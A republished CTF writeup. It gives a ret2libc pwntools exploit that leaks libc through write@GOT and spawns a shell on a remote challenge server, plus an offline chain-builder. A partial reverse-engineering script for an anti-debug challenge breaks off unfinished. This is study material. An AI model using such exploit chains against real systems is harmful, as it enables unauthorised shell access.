2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail the writeups of several CTF problems. The content is of high quality, so the editor shares it as a reference; after reading it you should have a reasonable understanding of the techniques involved.
0x01 Pwn
This is a relatively simple pwn problem. First load the binary into IDA and skim the program, as shown in the figure.
The function that reads input has no stack protection (no canary), and the read copies 0x34 bytes into a buffer that has only 32 bytes before the saved return address, so the return address can be overwritten. Using the address of game as the fake return address makes the program loop back and run the prompts again, which gives a second overflow. On the first pass, return into write@plt as write(1, got_write, 4) with game as write's return address: this prints the GOT entry of write, and from the libc symbol offsets the address of system is computed. On the second pass, "/bin/sh\0" is supplied as the name, which the program stores at 0x804A06C, and the return address is pointed at system with 0x804A06C as its argument.
The Python exploit is as follows:
from pwn import *

def rungameAgainPoc(p, yourname, flag):
    # match on the tail of each prompt so a stray space in the banner does not hang recvuntil
    p.recvuntil(b"what's your name?\n")
    p.send(yourname + b"\n")
    p.recvuntil(b"want to get flag?\n")
    p.send(flag)

pwnelf = ELF("./pwn")
libcelf = ELF("./libc-2.23.so")
gameadd = 0x080485CB            # address of game(): returning here re-runs the vulnerable read
plt_write = pwnelf.symbols['write']
got_write = pwnelf.got['write']

# p = process('./pwn', env={'LD_PRELOAD': './libc-2.23.so'})
p = remote('117.50.60.184', 12345)

# stage 1: 32 bytes of padding, then write@plt with game() as its return address,
# followed by write's arguments (1, got_write, 4); 52 bytes in all, exactly 0x34
rungameAgainPoc(p, b"ichuqiu",
                b"0" * 32 + p32(plt_write) + p32(gameadd) + p32(1) + p32(got_write) + p32(4))
write_addr = u32(p.recv(4))
print("pwn write", hex(write_addr))

# the leaked write address minus its libc offset gives the libc base; add system's offset
libcelf_system_add = libcelf.symbols["system"] + write_addr - libcelf.symbols["write"]
print("pwn libcelf_system_add", hex(libcelf_system_add))

# stage 2: the name is stored at 0x804A06C, so "/bin/sh\0" goes there and system() is called on it
rungameAgainPoc(p, b"/bin/sh\0",
                b"0" * 32 + p32(libcelf_system_add) + p32(gameadd) + p32(0x804A06C))
p.interactive()
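The frame layout and the leak arithmetic above are the whole exploit, so here they are as an added example that builds and checks both stages offline (not the writeup's code, and no pwntools needed). game and the "/bin/sh" address are the values from the writeup; the PLT, GOT and libc offsets are hypothetical placeholders for what pwntools would read from ./pwn and ./libc-2.23.so. It also adds the check a practitioner wants after a leak: the computed libc base must be page aligned, otherwise the offsets come from the wrong libc.

```python
import struct

# Layout of game()'s frame as described in the writeup: a 32-byte buffer, then the
# saved return address; read() copies 0x34 bytes, so 20 bytes of chain fit after
# the padding. Constants marked "hypothetical" are placeholders standing in for the
# values pwntools would read from ./pwn and ./libc-2.23.so.
BUF_SIZE = 32
READ_LEN = 0x34

GAME = 0x080485CB           # from the writeup: returning here re-runs the vulnerable read
BINSH = 0x0804A06C          # from the writeup: where the "name" input is stored
PLT_WRITE = 0x08048400      # hypothetical: pwnelf.symbols['write']
GOT_WRITE = 0x0804A01C      # hypothetical: pwnelf.got['write']
LIBC_WRITE_OFF = 0xD43C0    # hypothetical: libcelf.symbols['write']
LIBC_SYSTEM_OFF = 0x3A940   # hypothetical: libcelf.symbols['system']


def p32(x):
    return struct.pack("<I", x & 0xFFFFFFFF)


def u32(data):
    return struct.unpack("<I", data[:4])[0]


def build_chain(callee, ret_after, args, padding=b"0" * BUF_SIZE):
    """x86 ret2plt frame: [padding][callee][where callee returns][arg0..argN].

    Raises if the chain does not fit in the 0x34 bytes that read() copies."""
    chain = padding + p32(callee) + p32(ret_after) + b"".join(p32(a) for a in args)
    if len(chain) > READ_LEN:
        raise ValueError("chain is %d bytes but read() only copies %d" % (len(chain), READ_LEN))
    return chain


def leak_chain():
    # write(1, &GOT[write], 4), then return into game() for a second overflow
    return build_chain(PLT_WRITE, GAME, [1, GOT_WRITE, 4])


def plausible_libc_base(base):
    # libc is mapped on a page boundary; a misaligned base almost always means the
    # offsets come from a libc build that does not match the target
    return base & 0xFFF == 0


def resolve_system(leaked_write):
    base = leaked_write - LIBC_WRITE_OFF
    if not plausible_libc_base(base):
        raise ValueError("libc base %#x is not page aligned: wrong libc?" % base)
    return base + LIBC_SYSTEM_OFF


def system_chain(system):
    # system("/bin/sh") with "/bin/sh\0" already stored at BINSH by the name prompt
    return build_chain(system, GAME, [BINSH])


def describe_chain(chain):
    """Split a chain back into its frame slots, for checking the layout."""
    words = [u32(chain[i:i + 4]) for i in range(BUF_SIZE, len(chain), 4)]
    return {"callee": words[0], "ret_after": words[1], "args": words[2:]}


if __name__ == "__main__":
    stage1 = leak_chain()
    print("stage 1 (%d bytes):" % len(stage1), describe_chain(stage1))
    # constructed leak: what p.recv(4) would return if libc were mapped at 0xF7D90000
    leaked = u32(p32(0xF7D90000 + LIBC_WRITE_OFF))
    system = resolve_system(leaked)
    print("system at %#x" % system)
    print("stage 2:", describe_chain(system_chain(system)))
```

The stage-1 chain is exactly 0x34 bytes, which is why the three arguments to write fit but nothing more would; build_chain refuses anything longer so a miscounted payload fails locally instead of silently truncating on the target.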
Flag {62c51c85-1516-4ad8-989c-58ce8c29642e}
0x02 Antidbg
In IDA, look for the key function: it contains a comparison loop.
A preliminary judgement is that an 8-digit number is being checked, so the comparison is done position by position.
# Constants compared against, as IDA shows them (stack variables of the checking function):
# [ebp+var_6C] 01050D02070106010206000B07010C06
# [ebp+var_4C] 02080602
# [ebp+var_5C] 0100070D020108080D000103040D0303
# [ebp+var_48] 02050009
# [ebp+var_44] 00000D02

def cover(buf):
    # IDA prints a dword/xmmword immediate with the most significant byte first;
    # reversing the decoded bytes gives the order the bytes actually have in memory
    buf = bytes.fromhex(buf)
    return buf[::-1]

def cover_hex_lines(buf):
    # turn a multi-line hex dump copied out of IDA into bytes
    return bytes.fromhex(buf.replace(" ", "").replace("\r", "").replace("\n", ""))

# the five stack variables are contiguous (var_6C, var_5C, var_4C, var_48, var_44), 44 bytes in all
var_6c = (cover("01050D02070106010206000B07010C06")
          + cover("0100070D020108080D000103040D0303")
          + cover("02080602") + cover("02050009")
          + cover("00000D02"))
# print(len(var_6c))

# data dump starting at byte_402178; only the first 42 bytes are indexed by the loop below
byte_402178 = cover_hex_lines("""02 02 02 03 01 01 02
01 01 02 01 01 00 01 01 02 02 00 01 01 01 01 00
01 01 02 02 00 01 01 02 02 01 01 01 01 01 02 01
01 03 00 00 00
03 03 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01
06 0C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
00 00 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00
48 00 00 00 E4 22 00 00 E4 16 00 00 00
EF 28 68 5B 00 00 00 0C 00 00 00 14 00 00 00
2C 23 00 00 2C 17 00 00 00 EF 28 68 5B
00 00 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
40 17 00 00 00 EF 28 68 5B 00 00 00
0E 00 00 00 00
A0 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00 00 30 40 00
E0 22 40 00 01 00 00 00 E8 20 40 00 00 00
00 00 00 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00
00 00 00 00 00 00""")

byte_402138 = cover_hex_lines("""00 00 00 01 00 00 00
02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00
06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00
0A 00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00
0E 00 00 00 0F 00 00""")

dword_403018 = cover_hex_lines("""02 00 00 00 02 00 00 00
02 00 00 00 02 00 00 00 00""")

# .text:0040110E mov ecx, [ebp+var_4]
# .text:00401111 xor ecx, ebp
# .text:00401113 mov dword_40301C, 3
# .text:0040111D mov dword_403020, 6
# .text:00401127 mov dword_403024, 7
# the program overwrites three entries of the table at runtime, so the value in memory
# differs from the static dump: patch the dump to match what the program actually uses
dword_403018 = (dword_403018[0:4] + b"\x03" + dword_403018[5:8]
                + b"\x06" + dword_403018[9:12] + b"\x07"
                + dword_403018[13:])
print(dword_403018.hex())

for i in range(0, 42):
    # byte_402178[i] selects an entry of dword_403018 (each entry is 4 bytes)
    hightnum = dword_403018[byte_402178[i] * 4]
    # (the published writeup ends here)
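The two things the script above has to get right are easy to get wrong by hand: the byte order of constants as IDA displays them, and replaying the runtime stores onto the static table before indexing it. Here is an added example (not the writeup's code) that does both by address with struct rather than by hardcoded slicing, so further stores from the disassembly can be appended to the list. The table address, the three stores, the static dump, the var_6C constant and the first bytes of byte_402178 are the values quoted in the writeup; the function names are my own.

```python
import struct

TABLE_BASE = 0x403018          # dword_403018 from the disassembly
RUNTIME_STORES = [             # mov dword_XXXXXX, imm at 0x401113, 0x40111D, 0x401127
    (0x40301C, 3),
    (0x403020, 6),
    (0x403024, 7),
]


def ida_immediate_to_memory(text):
    """IDA prints a dword/xmmword immediate most-significant byte first; on x86 the
    bytes sit in memory in the opposite order, so reverse them."""
    return bytes.fromhex(text)[::-1]


def apply_dword_stores(dump, dump_base, stores):
    """Replay little-endian dword stores onto a copy of a static data dump."""
    buf = bytearray(dump)
    for addr, value in stores:
        off = addr - dump_base
        if off < 0 or off + 4 > len(buf):
            raise ValueError("store to %#x lands outside the dump" % addr)
        struct.pack_into("<I", buf, off, value)
    return bytes(buf)


def dword_table(dump):
    """Read a dump as a list of little-endian dwords (a trailing partial dword is ignored)."""
    n = len(dump) // 4
    return list(struct.unpack("<%dI" % n, dump[:n * 4]))


def lookup_high_digits(table, selector):
    """The writeup's 'hightnum' step: each selector byte picks one entry of the table."""
    return [table[b] for b in selector]


# static dump of dword_403018 as quoted in the writeup (four dwords of 2 plus a stray byte)
STATIC_DUMP = bytes.fromhex("02000000" "02000000" "02000000" "02000000" "00")
# first seven bytes of byte_402178 as quoted in the writeup
SELECTOR = bytes.fromhex("02020203010102")
# [ebp+var_6C] as IDA shows it
VAR_6C_TEXT = "01050D02070106010206000B07010C06"


def recover_tables():
    patched = apply_dword_stores(STATIC_DUMP, TABLE_BASE, RUNTIME_STORES)
    table = dword_table(patched)
    return table, lookup_high_digits(table, SELECTOR), ida_immediate_to_memory(VAR_6C_TEXT)


if __name__ == "__main__":
    table, digits, var_6c = recover_tables()
    print("table after runtime stores:", table)
    print("high digits for the first bytes:", digits)
    print("var_6C in memory order:", var_6c.hex())
```

Without the stores the table is [2, 2, 2, 2] and every lookup returns 2; with them it is [2, 3, 6, 7], which is the table the program actually indexes after the code at 0x401113 has run. A debugger attached at the comparison would show the same values, which is the quickest way to confirm a patched static dump.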